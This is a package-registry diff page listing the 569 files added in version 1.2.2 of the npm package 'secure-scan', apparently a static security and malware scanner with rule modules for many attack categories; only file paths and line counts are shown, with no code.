npm - secure-scan - Versions diffs - 1.2.2 - Mend

secure-scan 1.2.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (569) hide show

package/README.md +564 -0
package/dist/ai/aiAnalyzer.d.ts +99 -0
package/dist/ai/aiAnalyzer.d.ts.map +1 -0
package/dist/ai/aiAnalyzer.js +669 -0
package/dist/ai/aiAnalyzer.js.map +1 -0
package/dist/ai/index.d.ts +5 -0
package/dist/ai/index.d.ts.map +1 -0
package/dist/ai/index.js +21 -0
package/dist/ai/index.js.map +1 -0
package/dist/analyzers/base/baseAnalyzer.d.ts +44 -0
package/dist/analyzers/base/baseAnalyzer.d.ts.map +1 -0
package/dist/analyzers/base/baseAnalyzer.js +53 -0
package/dist/analyzers/base/baseAnalyzer.js.map +1 -0
package/dist/analyzers/base/index.d.ts +5 -0
package/dist/analyzers/base/index.d.ts.map +1 -0
package/dist/analyzers/base/index.js +21 -0
package/dist/analyzers/base/index.js.map +1 -0
package/dist/analyzers/c-cpp/cppAnalyzer.d.ts +60 -0
package/dist/analyzers/c-cpp/cppAnalyzer.d.ts.map +1 -0
package/dist/analyzers/c-cpp/cppAnalyzer.js +218 -0
package/dist/analyzers/c-cpp/cppAnalyzer.js.map +1 -0
package/dist/analyzers/c-cpp/index.d.ts +5 -0
package/dist/analyzers/c-cpp/index.d.ts.map +1 -0
package/dist/analyzers/c-cpp/index.js +21 -0
package/dist/analyzers/c-cpp/index.js.map +1 -0
package/dist/analyzers/core/engine/index.d.ts +5 -0
package/dist/analyzers/core/engine/index.d.ts.map +1 -0
package/dist/analyzers/core/engine/index.js +21 -0
package/dist/analyzers/core/engine/index.js.map +1 -0
package/dist/analyzers/core/engine/ruleEngine.d.ts +46 -0
package/dist/analyzers/core/engine/ruleEngine.d.ts.map +1 -0
package/dist/analyzers/core/engine/ruleEngine.js +173 -0
package/dist/analyzers/core/engine/ruleEngine.js.map +1 -0
package/dist/analyzers/core/index.d.ts +8 -0
package/dist/analyzers/core/index.d.ts.map +1 -0
package/dist/analyzers/core/index.js +24 -0
package/dist/analyzers/core/index.js.map +1 -0
package/dist/analyzers/core/scanner/fileScanner.d.ts +31 -0
package/dist/analyzers/core/scanner/fileScanner.d.ts.map +1 -0
package/dist/analyzers/core/scanner/fileScanner.js +199 -0
package/dist/analyzers/core/scanner/fileScanner.js.map +1 -0
package/dist/analyzers/core/scanner/index.d.ts +5 -0
package/dist/analyzers/core/scanner/index.d.ts.map +1 -0
package/dist/analyzers/core/scanner/index.js +21 -0
package/dist/analyzers/core/scanner/index.js.map +1 -0
package/dist/analyzers/core/scoring/index.d.ts +5 -0
package/dist/analyzers/core/scoring/index.d.ts.map +1 -0
package/dist/analyzers/core/scoring/index.js +21 -0
package/dist/analyzers/core/scoring/index.js.map +1 -0
package/dist/analyzers/core/scoring/riskScoring.d.ts +49 -0
package/dist/analyzers/core/scoring/riskScoring.d.ts.map +1 -0
package/dist/analyzers/core/scoring/riskScoring.js +180 -0
package/dist/analyzers/core/scoring/riskScoring.js.map +1 -0
package/dist/analyzers/core/securityScanner.d.ts +47 -0
package/dist/analyzers/core/securityScanner.d.ts.map +1 -0
package/dist/analyzers/core/securityScanner.js +298 -0
package/dist/analyzers/core/securityScanner.js.map +1 -0
package/dist/analyzers/csharp/csharpAnalyzer.d.ts +64 -0
package/dist/analyzers/csharp/csharpAnalyzer.d.ts.map +1 -0
package/dist/analyzers/csharp/csharpAnalyzer.js +232 -0
package/dist/analyzers/csharp/csharpAnalyzer.js.map +1 -0
package/dist/analyzers/csharp/index.d.ts +5 -0
package/dist/analyzers/csharp/index.d.ts.map +1 -0
package/dist/analyzers/csharp/index.js +21 -0
package/dist/analyzers/csharp/index.js.map +1 -0
package/dist/analyzers/iac/iacAnalyzer.d.ts +36 -0
package/dist/analyzers/iac/iacAnalyzer.d.ts.map +1 -0
package/dist/analyzers/iac/iacAnalyzer.js +182 -0
package/dist/analyzers/iac/iacAnalyzer.js.map +1 -0
package/dist/analyzers/iac/index.d.ts +5 -0
package/dist/analyzers/iac/index.d.ts.map +1 -0
package/dist/analyzers/iac/index.js +21 -0
package/dist/analyzers/iac/index.js.map +1 -0
package/dist/analyzers/index.d.ts +30 -0
package/dist/analyzers/index.d.ts.map +1 -0
package/dist/analyzers/index.js +80 -0
package/dist/analyzers/index.js.map +1 -0
package/dist/analyzers/java/index.d.ts +5 -0
package/dist/analyzers/java/index.d.ts.map +1 -0
package/dist/analyzers/java/index.js +21 -0
package/dist/analyzers/java/index.js.map +1 -0
package/dist/analyzers/java/javaAnalyzer.d.ts +64 -0
package/dist/analyzers/java/javaAnalyzer.d.ts.map +1 -0
package/dist/analyzers/java/javaAnalyzer.js +224 -0
package/dist/analyzers/java/javaAnalyzer.js.map +1 -0
package/dist/analyzers/javascript/astUtils.d.ts +170 -0
package/dist/analyzers/javascript/astUtils.d.ts.map +1 -0
package/dist/analyzers/javascript/astUtils.js +700 -0
package/dist/analyzers/javascript/astUtils.js.map +1 -0
package/dist/analyzers/javascript/index.d.ts +18 -0
package/dist/analyzers/javascript/index.d.ts.map +1 -0
package/dist/analyzers/javascript/index.js +50 -0
package/dist/analyzers/javascript/index.js.map +1 -0
package/dist/analyzers/javascript/javascriptAnalyzer.d.ts +111 -0
package/dist/analyzers/javascript/javascriptAnalyzer.d.ts.map +1 -0
package/dist/analyzers/javascript/javascriptAnalyzer.js +860 -0
package/dist/analyzers/javascript/javascriptAnalyzer.js.map +1 -0
package/dist/analyzers/javascript/malwareDetector.d.ts +102 -0
package/dist/analyzers/javascript/malwareDetector.d.ts.map +1 -0
package/dist/analyzers/javascript/malwareDetector.js +616 -0
package/dist/analyzers/javascript/malwareDetector.js.map +1 -0
package/dist/analyzers/javascript/packageJsonAnalyzer.d.ts +87 -0
package/dist/analyzers/javascript/packageJsonAnalyzer.d.ts.map +1 -0
package/dist/analyzers/javascript/packageJsonAnalyzer.js +553 -0
package/dist/analyzers/javascript/packageJsonAnalyzer.js.map +1 -0
package/dist/analyzers/javascript/taintAnalyzer.d.ts +120 -0
package/dist/analyzers/javascript/taintAnalyzer.d.ts.map +1 -0
package/dist/analyzers/javascript/taintAnalyzer.js +526 -0
package/dist/analyzers/javascript/taintAnalyzer.js.map +1 -0
package/dist/analyzers/php/index.d.ts +5 -0
package/dist/analyzers/php/index.d.ts.map +1 -0
package/dist/analyzers/php/index.js +21 -0
package/dist/analyzers/php/index.js.map +1 -0
package/dist/analyzers/php/phpAnalyzer.d.ts +56 -0
package/dist/analyzers/php/phpAnalyzer.d.ts.map +1 -0
package/dist/analyzers/php/phpAnalyzer.js +202 -0
package/dist/analyzers/php/phpAnalyzer.js.map +1 -0
package/dist/analyzers/python/index.d.ts +5 -0
package/dist/analyzers/python/index.d.ts.map +1 -0
package/dist/analyzers/python/index.js +21 -0
package/dist/analyzers/python/index.js.map +1 -0
package/dist/analyzers/python/pythonAnalyzer.d.ts +64 -0
package/dist/analyzers/python/pythonAnalyzer.d.ts.map +1 -0
package/dist/analyzers/python/pythonAnalyzer.js +226 -0
package/dist/analyzers/python/pythonAnalyzer.js.map +1 -0
package/dist/cli/index.d.ts +7 -0
package/dist/cli/index.d.ts.map +1 -0
package/dist/cli/index.js +281 -0
package/dist/cli/index.js.map +1 -0
package/dist/core/engine/index.d.ts +5 -0
package/dist/core/engine/index.d.ts.map +1 -0
package/dist/core/engine/index.js +21 -0
package/dist/core/engine/index.js.map +1 -0
package/dist/core/engine/ruleEngine.d.ts +46 -0
package/dist/core/engine/ruleEngine.d.ts.map +1 -0
package/dist/core/engine/ruleEngine.js +173 -0
package/dist/core/engine/ruleEngine.js.map +1 -0
package/dist/core/index.d.ts +8 -0
package/dist/core/index.d.ts.map +1 -0
package/dist/core/index.js +24 -0
package/dist/core/index.js.map +1 -0
package/dist/core/scanner/fileScanner.d.ts +31 -0
package/dist/core/scanner/fileScanner.d.ts.map +1 -0
package/dist/core/scanner/fileScanner.js +199 -0
package/dist/core/scanner/fileScanner.js.map +1 -0
package/dist/core/scanner/index.d.ts +5 -0
package/dist/core/scanner/index.d.ts.map +1 -0
package/dist/core/scanner/index.js +21 -0
package/dist/core/scanner/index.js.map +1 -0
package/dist/core/scoring/index.d.ts +5 -0
package/dist/core/scoring/index.d.ts.map +1 -0
package/dist/core/scoring/index.js +21 -0
package/dist/core/scoring/index.js.map +1 -0
package/dist/core/scoring/riskScoring.d.ts +49 -0
package/dist/core/scoring/riskScoring.d.ts.map +1 -0
package/dist/core/scoring/riskScoring.js +180 -0
package/dist/core/scoring/riskScoring.js.map +1 -0
package/dist/core/securityScanner.d.ts +47 -0
package/dist/core/securityScanner.d.ts.map +1 -0
package/dist/core/securityScanner.js +298 -0
package/dist/core/securityScanner.js.map +1 -0
package/dist/dependencies/aiDependencyAnalyzer.d.ts +96 -0
package/dist/dependencies/aiDependencyAnalyzer.d.ts.map +1 -0
package/dist/dependencies/aiDependencyAnalyzer.js +435 -0
package/dist/dependencies/aiDependencyAnalyzer.js.map +1 -0
package/dist/dependencies/database/cveDatabase.d.ts +32 -0
package/dist/dependencies/database/cveDatabase.d.ts.map +1 -0
package/dist/dependencies/database/cveDatabase.js +393 -0
package/dist/dependencies/database/cveDatabase.js.map +1 -0
package/dist/dependencies/database/index.d.ts +6 -0
package/dist/dependencies/database/index.d.ts.map +1 -0
package/dist/dependencies/database/index.js +22 -0
package/dist/dependencies/database/index.js.map +1 -0
package/dist/dependencies/database/maliciousPackages.d.ts +43 -0
package/dist/dependencies/database/maliciousPackages.d.ts.map +1 -0
package/dist/dependencies/database/maliciousPackages.js +279 -0
package/dist/dependencies/database/maliciousPackages.js.map +1 -0
package/dist/dependencies/dependencyAnalyzer.d.ts +74 -0
package/dist/dependencies/dependencyAnalyzer.d.ts.map +1 -0
package/dist/dependencies/dependencyAnalyzer.js +349 -0
package/dist/dependencies/dependencyAnalyzer.js.map +1 -0
package/dist/dependencies/detectors/index.d.ts +7 -0
package/dist/dependencies/detectors/index.d.ts.map +1 -0
package/dist/dependencies/detectors/index.js +28 -0
package/dist/dependencies/detectors/index.js.map +1 -0
package/dist/dependencies/detectors/securityStandards.d.ts +15 -0
package/dist/dependencies/detectors/securityStandards.d.ts.map +1 -0
package/dist/dependencies/detectors/securityStandards.js +178 -0
package/dist/dependencies/detectors/securityStandards.js.map +1 -0
package/dist/dependencies/detectors/vulnerabilityDetector.d.ts +53 -0
package/dist/dependencies/detectors/vulnerabilityDetector.d.ts.map +1 -0
package/dist/dependencies/detectors/vulnerabilityDetector.js +289 -0
package/dist/dependencies/detectors/vulnerabilityDetector.js.map +1 -0
package/dist/dependencies/index.d.ts +14 -0
package/dist/dependencies/index.d.ts.map +1 -0
package/dist/dependencies/index.js +43 -0
package/dist/dependencies/index.js.map +1 -0
package/dist/dependencies/installed/index.d.ts +8 -0
package/dist/dependencies/installed/index.d.ts.map +1 -0
package/dist/dependencies/installed/index.js +24 -0
package/dist/dependencies/installed/index.js.map +1 -0
package/dist/dependencies/installed/installedScanner.d.ts +91 -0
package/dist/dependencies/installed/installedScanner.d.ts.map +1 -0
package/dist/dependencies/installed/installedScanner.js +766 -0
package/dist/dependencies/installed/installedScanner.js.map +1 -0
package/dist/dependencies/installed/malwarePatterns.d.ts +32 -0
package/dist/dependencies/installed/malwarePatterns.d.ts.map +1 -0
package/dist/dependencies/installed/malwarePatterns.js +480 -0
package/dist/dependencies/installed/malwarePatterns.js.map +1 -0
package/dist/dependencies/installed/types.d.ts +274 -0
package/dist/dependencies/installed/types.d.ts.map +1 -0
package/dist/dependencies/installed/types.js +7 -0
package/dist/dependencies/installed/types.js.map +1 -0
package/dist/dependencies/parsers/base/baseParser.d.ts +44 -0
package/dist/dependencies/parsers/base/baseParser.d.ts.map +1 -0
package/dist/dependencies/parsers/base/baseParser.js +80 -0
package/dist/dependencies/parsers/base/baseParser.js.map +1 -0
package/dist/dependencies/parsers/base/index.d.ts +6 -0
package/dist/dependencies/parsers/base/index.d.ts.map +1 -0
package/dist/dependencies/parsers/base/index.js +27 -0
package/dist/dependencies/parsers/base/index.js.map +1 -0
package/dist/dependencies/parsers/cpp/cppParser.d.ts +36 -0
package/dist/dependencies/parsers/cpp/cppParser.d.ts.map +1 -0
package/dist/dependencies/parsers/cpp/cppParser.js +196 -0
package/dist/dependencies/parsers/cpp/cppParser.js.map +1 -0
package/dist/dependencies/parsers/cpp/index.d.ts +6 -0
package/dist/dependencies/parsers/cpp/index.d.ts.map +1 -0
package/dist/dependencies/parsers/cpp/index.js +27 -0
package/dist/dependencies/parsers/cpp/index.js.map +1 -0
package/dist/dependencies/parsers/csharp/csharpParser.d.ts +32 -0
package/dist/dependencies/parsers/csharp/csharpParser.d.ts.map +1 -0
package/dist/dependencies/parsers/csharp/csharpParser.js +125 -0
package/dist/dependencies/parsers/csharp/csharpParser.js.map +1 -0
package/dist/dependencies/parsers/csharp/index.d.ts +6 -0
package/dist/dependencies/parsers/csharp/index.d.ts.map +1 -0
package/dist/dependencies/parsers/csharp/index.js +27 -0
package/dist/dependencies/parsers/csharp/index.js.map +1 -0
package/dist/dependencies/parsers/index.d.ts +24 -0
package/dist/dependencies/parsers/index.d.ts.map +1 -0
package/dist/dependencies/parsers/index.js +69 -0
package/dist/dependencies/parsers/index.js.map +1 -0
package/dist/dependencies/parsers/java/index.d.ts +6 -0
package/dist/dependencies/parsers/java/index.d.ts.map +1 -0
package/dist/dependencies/parsers/java/index.js +27 -0
package/dist/dependencies/parsers/java/index.js.map +1 -0
package/dist/dependencies/parsers/java/javaParser.d.ts +32 -0
package/dist/dependencies/parsers/java/javaParser.d.ts.map +1 -0
package/dist/dependencies/parsers/java/javaParser.js +168 -0
package/dist/dependencies/parsers/java/javaParser.js.map +1 -0
package/dist/dependencies/parsers/javascript/index.d.ts +6 -0
package/dist/dependencies/parsers/javascript/index.d.ts.map +1 -0
package/dist/dependencies/parsers/javascript/index.js +27 -0
package/dist/dependencies/parsers/javascript/index.js.map +1 -0
package/dist/dependencies/parsers/javascript/javascriptParser.d.ts +55 -0
package/dist/dependencies/parsers/javascript/javascriptParser.d.ts.map +1 -0
package/dist/dependencies/parsers/javascript/javascriptParser.js +266 -0
package/dist/dependencies/parsers/javascript/javascriptParser.js.map +1 -0
package/dist/dependencies/parsers/php/index.d.ts +6 -0
package/dist/dependencies/parsers/php/index.d.ts.map +1 -0
package/dist/dependencies/parsers/php/index.js +27 -0
package/dist/dependencies/parsers/php/index.js.map +1 -0
package/dist/dependencies/parsers/php/phpParser.d.ts +35 -0
package/dist/dependencies/parsers/php/phpParser.d.ts.map +1 -0
package/dist/dependencies/parsers/php/phpParser.js +162 -0
package/dist/dependencies/parsers/php/phpParser.js.map +1 -0
package/dist/dependencies/parsers/python/index.d.ts +6 -0
package/dist/dependencies/parsers/python/index.d.ts.map +1 -0
package/dist/dependencies/parsers/python/index.js +27 -0
package/dist/dependencies/parsers/python/index.js.map +1 -0
package/dist/dependencies/parsers/python/pythonParser.d.ts +60 -0
package/dist/dependencies/parsers/python/pythonParser.d.ts.map +1 -0
package/dist/dependencies/parsers/python/pythonParser.js +336 -0
package/dist/dependencies/parsers/python/pythonParser.js.map +1 -0
package/dist/dependencies/types.d.ts +280 -0
package/dist/dependencies/types.d.ts.map +1 -0
package/dist/dependencies/types.js +59 -0
package/dist/dependencies/types.js.map +1 -0
package/dist/i18n/index.d.ts +2 -0
package/dist/i18n/index.d.ts.map +1 -0
package/dist/i18n/index.js +18 -0
package/dist/i18n/index.js.map +1 -0
package/dist/i18n/translations.d.ts +55 -0
package/dist/i18n/translations.d.ts.map +1 -0
package/dist/i18n/translations.js +119 -0
package/dist/i18n/translations.js.map +1 -0
package/dist/index.d.ts +14 -0
package/dist/index.d.ts.map +1 -0
package/dist/index.js +36 -0
package/dist/index.js.map +1 -0
package/dist/reports/dependencyReportGenerator.d.ts +20 -0
package/dist/reports/dependencyReportGenerator.d.ts.map +1 -0
package/dist/reports/dependencyReportGenerator.js +690 -0
package/dist/reports/dependencyReportGenerator.js.map +1 -0
package/dist/reports/htmlReportGenerator.d.ts +43 -0
package/dist/reports/htmlReportGenerator.d.ts.map +1 -0
package/dist/reports/htmlReportGenerator.js +793 -0
package/dist/reports/htmlReportGenerator.js.map +1 -0
package/dist/reports/index.d.ts +7 -0
package/dist/reports/index.d.ts.map +1 -0
package/dist/reports/index.js +23 -0
package/dist/reports/index.js.map +1 -0
package/dist/reports/installedDepsReportGenerator.d.ts +14 -0
package/dist/reports/installedDepsReportGenerator.d.ts.map +1 -0
package/dist/reports/installedDepsReportGenerator.js +872 -0
package/dist/reports/installedDepsReportGenerator.js.map +1 -0
package/dist/rules/index.d.ts +31 -0
package/dist/rules/index.d.ts.map +1 -0
package/dist/rules/index.js +95 -0
package/dist/rules/index.js.map +1 -0
package/dist/rules/malware/categories/backdoors.d.ts +12 -0
package/dist/rules/malware/categories/backdoors.d.ts.map +1 -0
package/dist/rules/malware/categories/backdoors.js +163 -0
package/dist/rules/malware/categories/backdoors.js.map +1 -0
package/dist/rules/malware/categories/cryptominers.d.ts +13 -0
package/dist/rules/malware/categories/cryptominers.d.ts.map +1 -0
package/dist/rules/malware/categories/cryptominers.js +415 -0
package/dist/rules/malware/categories/cryptominers.js.map +1 -0
package/dist/rules/malware/categories/exfiltration.d.ts +20 -0
package/dist/rules/malware/categories/exfiltration.d.ts.map +1 -0
package/dist/rules/malware/categories/exfiltration.js +658 -0
package/dist/rules/malware/categories/exfiltration.js.map +1 -0
package/dist/rules/malware/categories/keyloggers.d.ts +19 -0
package/dist/rules/malware/categories/keyloggers.d.ts.map +1 -0
package/dist/rules/malware/categories/keyloggers.js +763 -0
package/dist/rules/malware/categories/keyloggers.js.map +1 -0
package/dist/rules/malware/categories/loaders.d.ts +20 -0
package/dist/rules/malware/categories/loaders.d.ts.map +1 -0
package/dist/rules/malware/categories/loaders.js +702 -0
package/dist/rules/malware/categories/loaders.js.map +1 -0
package/dist/rules/malware/categories/network.d.ts +19 -0
package/dist/rules/malware/categories/network.d.ts.map +1 -0
package/dist/rules/malware/categories/network.js +622 -0
package/dist/rules/malware/categories/network.js.map +1 -0
package/dist/rules/malware/categories/obfuscation.d.ts +22 -0
package/dist/rules/malware/categories/obfuscation.d.ts.map +1 -0
package/dist/rules/malware/categories/obfuscation.js +766 -0
package/dist/rules/malware/categories/obfuscation.js.map +1 -0
package/dist/rules/malware/constants/index.d.ts +281 -0
package/dist/rules/malware/constants/index.d.ts.map +1 -0
package/dist/rules/malware/constants/index.js +327 -0
package/dist/rules/malware/constants/index.js.map +1 -0
package/dist/rules/malware/engine/index.d.ts +178 -0
package/dist/rules/malware/engine/index.d.ts.map +1 -0
package/dist/rules/malware/engine/index.js +552 -0
package/dist/rules/malware/engine/index.js.map +1 -0
package/dist/rules/malware/index.d.ts +205 -0
package/dist/rules/malware/index.d.ts.map +1 -0
package/dist/rules/malware/index.js +837 -0
package/dist/rules/malware/index.js.map +1 -0
package/dist/rules/malware/scoring/index.d.ts +84 -0
package/dist/rules/malware/scoring/index.d.ts.map +1 -0
package/dist/rules/malware/scoring/index.js +441 -0
package/dist/rules/malware/scoring/index.js.map +1 -0
package/dist/rules/malware/types/index.d.ts +616 -0
package/dist/rules/malware/types/index.d.ts.map +1 -0
package/dist/rules/malware/types/index.js +155 -0
package/dist/rules/malware/types/index.js.map +1 -0
package/dist/rules/malware/utils/index.d.ts +117 -0
package/dist/rules/malware/utils/index.d.ts.map +1 -0
package/dist/rules/malware/utils/index.js +514 -0
package/dist/rules/malware/utils/index.js.map +1 -0
package/dist/rules/standards.d.ts +26 -0
package/dist/rules/standards.d.ts.map +1 -0
package/dist/rules/standards.js +352 -0
package/dist/rules/standards.js.map +1 -0
package/dist/rules/vulnerabilities/constants/index.d.ts +835 -0
package/dist/rules/vulnerabilities/constants/index.d.ts.map +1 -0
package/dist/rules/vulnerabilities/constants/index.js +544 -0
package/dist/rules/vulnerabilities/constants/index.js.map +1 -0
package/dist/rules/vulnerabilities/engine/index.d.ts +145 -0
package/dist/rules/vulnerabilities/engine/index.d.ts.map +1 -0
package/dist/rules/vulnerabilities/engine/index.js +581 -0
package/dist/rules/vulnerabilities/engine/index.js.map +1 -0
package/dist/rules/vulnerabilities/index.d.ts +148 -0
package/dist/rules/vulnerabilities/index.d.ts.map +1 -0
package/dist/rules/vulnerabilities/index.js +252 -0
package/dist/rules/vulnerabilities/index.js.map +1 -0
package/dist/rules/vulnerabilities/rules/authentication.d.ts +8 -0
package/dist/rules/vulnerabilities/rules/authentication.d.ts.map +1 -0
package/dist/rules/vulnerabilities/rules/authentication.js +419 -0
package/dist/rules/vulnerabilities/rules/authentication.js.map +1 -0
package/dist/rules/vulnerabilities/rules/commandInjection.d.ts +8 -0
package/dist/rules/vulnerabilities/rules/commandInjection.d.ts.map +1 -0
package/dist/rules/vulnerabilities/rules/commandInjection.js +300 -0
package/dist/rules/vulnerabilities/rules/commandInjection.js.map +1 -0
package/dist/rules/vulnerabilities/rules/csrf.d.ts +8 -0
package/dist/rules/vulnerabilities/rules/csrf.d.ts.map +1 -0
package/dist/rules/vulnerabilities/rules/csrf.js +261 -0
package/dist/rules/vulnerabilities/rules/csrf.js.map +1 -0
package/dist/rules/vulnerabilities/rules/deserialization.d.ts +8 -0
package/dist/rules/vulnerabilities/rules/deserialization.d.ts.map +1 -0
package/dist/rules/vulnerabilities/rules/deserialization.js +336 -0
package/dist/rules/vulnerabilities/rules/deserialization.js.map +1 -0
package/dist/rules/vulnerabilities/rules/fileUpload.d.ts +8 -0
package/dist/rules/vulnerabilities/rules/fileUpload.d.ts.map +1 -0
package/dist/rules/vulnerabilities/rules/fileUpload.js +325 -0
package/dist/rules/vulnerabilities/rules/fileUpload.js.map +1 -0
package/dist/rules/vulnerabilities/rules/hardcodedSecrets.d.ts +8 -0
package/dist/rules/vulnerabilities/rules/hardcodedSecrets.d.ts.map +1 -0
package/dist/rules/vulnerabilities/rules/hardcodedSecrets.js +446 -0
package/dist/rules/vulnerabilities/rules/hardcodedSecrets.js.map +1 -0
package/dist/rules/vulnerabilities/rules/index.d.ts +17 -0
package/dist/rules/vulnerabilities/rules/index.d.ts.map +1 -0
package/dist/rules/vulnerabilities/rules/index.js +47 -0
package/dist/rules/vulnerabilities/rules/index.js.map +1 -0
package/dist/rules/vulnerabilities/rules/pathTraversal.d.ts +8 -0
package/dist/rules/vulnerabilities/rules/pathTraversal.d.ts.map +1 -0
package/dist/rules/vulnerabilities/rules/pathTraversal.js +351 -0
package/dist/rules/vulnerabilities/rules/pathTraversal.js.map +1 -0
package/dist/rules/vulnerabilities/rules/prototypePollution.d.ts +8 -0
package/dist/rules/vulnerabilities/rules/prototypePollution.d.ts.map +1 -0
package/dist/rules/vulnerabilities/rules/prototypePollution.js +272 -0
package/dist/rules/vulnerabilities/rules/prototypePollution.js.map +1 -0
package/dist/rules/vulnerabilities/rules/securityMisconfiguration.d.ts +8 -0
package/dist/rules/vulnerabilities/rules/securityMisconfiguration.d.ts.map +1 -0
package/dist/rules/vulnerabilities/rules/securityMisconfiguration.js +438 -0
package/dist/rules/vulnerabilities/rules/securityMisconfiguration.js.map +1 -0
package/dist/rules/vulnerabilities/rules/sqlInjection.d.ts +12 -0
package/dist/rules/vulnerabilities/rules/sqlInjection.d.ts.map +1 -0
package/dist/rules/vulnerabilities/rules/sqlInjection.js +636 -0
package/dist/rules/vulnerabilities/rules/sqlInjection.js.map +1 -0
package/dist/rules/vulnerabilities/rules/ssrf.d.ts +8 -0
package/dist/rules/vulnerabilities/rules/ssrf.d.ts.map +1 -0
package/dist/rules/vulnerabilities/rules/ssrf.js +401 -0
package/dist/rules/vulnerabilities/rules/ssrf.js.map +1 -0
package/dist/rules/vulnerabilities/rules/xss.d.ts +11 -0
package/dist/rules/vulnerabilities/rules/xss.d.ts.map +1 -0
package/dist/rules/vulnerabilities/rules/xss.js +724 -0
package/dist/rules/vulnerabilities/rules/xss.js.map +1 -0
package/dist/rules/vulnerabilities/scoring/index.d.ts +80 -0
package/dist/rules/vulnerabilities/scoring/index.d.ts.map +1 -0
package/dist/rules/vulnerabilities/scoring/index.js +414 -0
package/dist/rules/vulnerabilities/scoring/index.js.map +1 -0
package/dist/rules/vulnerabilities/types/index.d.ts +830 -0
package/dist/rules/vulnerabilities/types/index.d.ts.map +1 -0
package/dist/rules/vulnerabilities/types/index.js +164 -0
package/dist/rules/vulnerabilities/types/index.js.map +1 -0
package/dist/rules/vulnerabilities/utils/index.d.ts +206 -0
package/dist/rules/vulnerabilities/utils/index.d.ts.map +1 -0
package/dist/rules/vulnerabilities/utils/index.js +615 -0
package/dist/rules/vulnerabilities/utils/index.js.map +1 -0
package/dist/types/index.d.ts +359 -0
package/dist/types/index.d.ts.map +1 -0
package/dist/types/index.js +61 -0
package/dist/types/index.js.map +1 -0
package/dist/utils/index.d.ts +82 -0
package/dist/utils/index.d.ts.map +1 -0
package/dist/utils/index.js +326 -0
package/dist/utils/index.js.map +1 -0
package/dist/utils/logger.d.ts +40 -0
package/dist/utils/logger.d.ts.map +1 -0
package/dist/utils/logger.js +139 -0
package/dist/utils/logger.js.map +1 -0
package/docs/ARCHITECTURE.md +320 -0
package/docs/V1.2.1-IA_Performances.md +116 -0
package/docs/images/WIN_Defender.png +0 -0
package/package.json +68 -0
package/secure-scan.config.json +134 -0
package/secure-scan.sln +29 -0
package/src/ai/aiAnalyzer.ts +714 -0
package/src/ai/index.ts +5 -0
package/src/analyzers/base/baseAnalyzer.ts +66 -0
package/src/analyzers/base/index.ts +5 -0
package/src/analyzers/c-cpp/cppAnalyzer.ts +308 -0
package/src/analyzers/c-cpp/index.ts +5 -0
package/src/analyzers/core/engine/index.ts +5 -0
package/src/analyzers/core/engine/ruleEngine.ts +221 -0
package/src/analyzers/core/index.ts +8 -0
package/src/analyzers/core/scanner/fileScanner.ts +204 -0
package/src/analyzers/core/scanner/index.ts +5 -0
package/src/analyzers/core/scoring/index.ts +5 -0
package/src/analyzers/core/scoring/riskScoring.ts +198 -0
package/src/analyzers/core/securityScanner.ts +321 -0
package/src/analyzers/csharp/csharpAnalyzer.ts +328 -0
package/src/analyzers/csharp/index.ts +5 -0
package/src/analyzers/iac/iacAnalyzer.ts +318 -0
package/src/analyzers/iac/index.ts +5 -0
package/src/analyzers/index.ts +67 -0
package/src/analyzers/java/index.ts +5 -0
package/src/analyzers/java/javaAnalyzer.ts +320 -0
package/src/analyzers/javascript/PROMPT_JS_ANALYZER.md +267 -0
package/src/analyzers/javascript/astUtils.ts +789 -0
package/src/analyzers/javascript/index.ts +50 -0
package/src/analyzers/javascript/javascriptAnalyzer.ts +984 -0
package/src/analyzers/javascript/malwareDetector.ts +697 -0
package/src/analyzers/javascript/packageJsonAnalyzer.ts +626 -0
package/src/analyzers/javascript/taintAnalyzer.ts +630 -0
package/src/analyzers/php/index.ts +5 -0
package/src/analyzers/php/phpAnalyzer.ts +280 -0
package/src/analyzers/python/index.ts +5 -0
package/src/analyzers/python/pythonAnalyzer.ts +319 -0
package/src/cli/index.ts +276 -0
package/src/dependencies/aiDependencyAnalyzer.ts +496 -0
package/src/dependencies/database/cveDatabase.ts +426 -0
package/src/dependencies/database/index.ts +6 -0
package/src/dependencies/database/maliciousPackages.ts +286 -0
package/src/dependencies/dependencyAnalyzer.ts +394 -0
package/src/dependencies/detectors/index.ts +7 -0
package/src/dependencies/detectors/securityStandards.ts +200 -0
package/src/dependencies/detectors/vulnerabilityDetector.ts +343 -0
package/src/dependencies/index.ts +27 -0
package/src/dependencies/installed/index.ts +8 -0
package/src/dependencies/installed/installedScanner.ts +821 -0
package/src/dependencies/installed/malwarePatterns.ts +492 -0
package/src/dependencies/installed/types.ts +287 -0
package/src/dependencies/parsers/base/baseParser.ts +108 -0
package/src/dependencies/parsers/base/index.ts +6 -0
package/src/dependencies/parsers/cpp/cppParser.ts +245 -0
package/src/dependencies/parsers/cpp/index.ts +6 -0
package/src/dependencies/parsers/csharp/csharpParser.ts +151 -0
package/src/dependencies/parsers/csharp/index.ts +6 -0
package/src/dependencies/parsers/index.ts +56 -0
package/src/dependencies/parsers/java/index.ts +6 -0
package/src/dependencies/parsers/java/javaParser.ts +203 -0
package/src/dependencies/parsers/javascript/index.ts +6 -0
package/src/dependencies/parsers/javascript/javascriptParser.ts +362 -0
package/src/dependencies/parsers/php/index.ts +6 -0
package/src/dependencies/parsers/php/phpParser.ts +208 -0
package/src/dependencies/parsers/python/index.ts +6 -0
package/src/dependencies/parsers/python/pythonParser.ts +437 -0
package/src/dependencies/types.ts +330 -0
package/src/i18n/index.ts +1 -0
package/src/i18n/translations.ts +194 -0
package/src/index.ts +16 -0
package/src/reports/dependencyReportGenerator.ts +717 -0
package/src/reports/htmlReportGenerator.ts +781 -0
package/src/reports/index.ts +7 -0
package/src/reports/installedDepsReportGenerator.ts +899 -0
package/src/rules/index.ts +58 -0
package/src/rules/malware/INFO.md +287 -0
package/src/rules/malware/categories/backdoors.ts +174 -0
package/src/rules/malware/categories/cryptominers.ts +434 -0
package/src/rules/malware/categories/exfiltration.ts +677 -0
package/src/rules/malware/categories/keyloggers.ts +780 -0
package/src/rules/malware/categories/loaders.ts +721 -0
package/src/rules/malware/categories/network.ts +639 -0
package/src/rules/malware/categories/obfuscation.ts +788 -0
package/src/rules/malware/constants/index.ts +358 -0
package/src/rules/malware/engine/index.ts +758 -0
package/src/rules/malware/index.ts +928 -0
package/src/rules/malware/scoring/index.ts +549 -0
package/src/rules/malware/types/index.ts +752 -0
package/src/rules/malware/utils/index.ts +643 -0
package/src/rules/standards.ts +372 -0
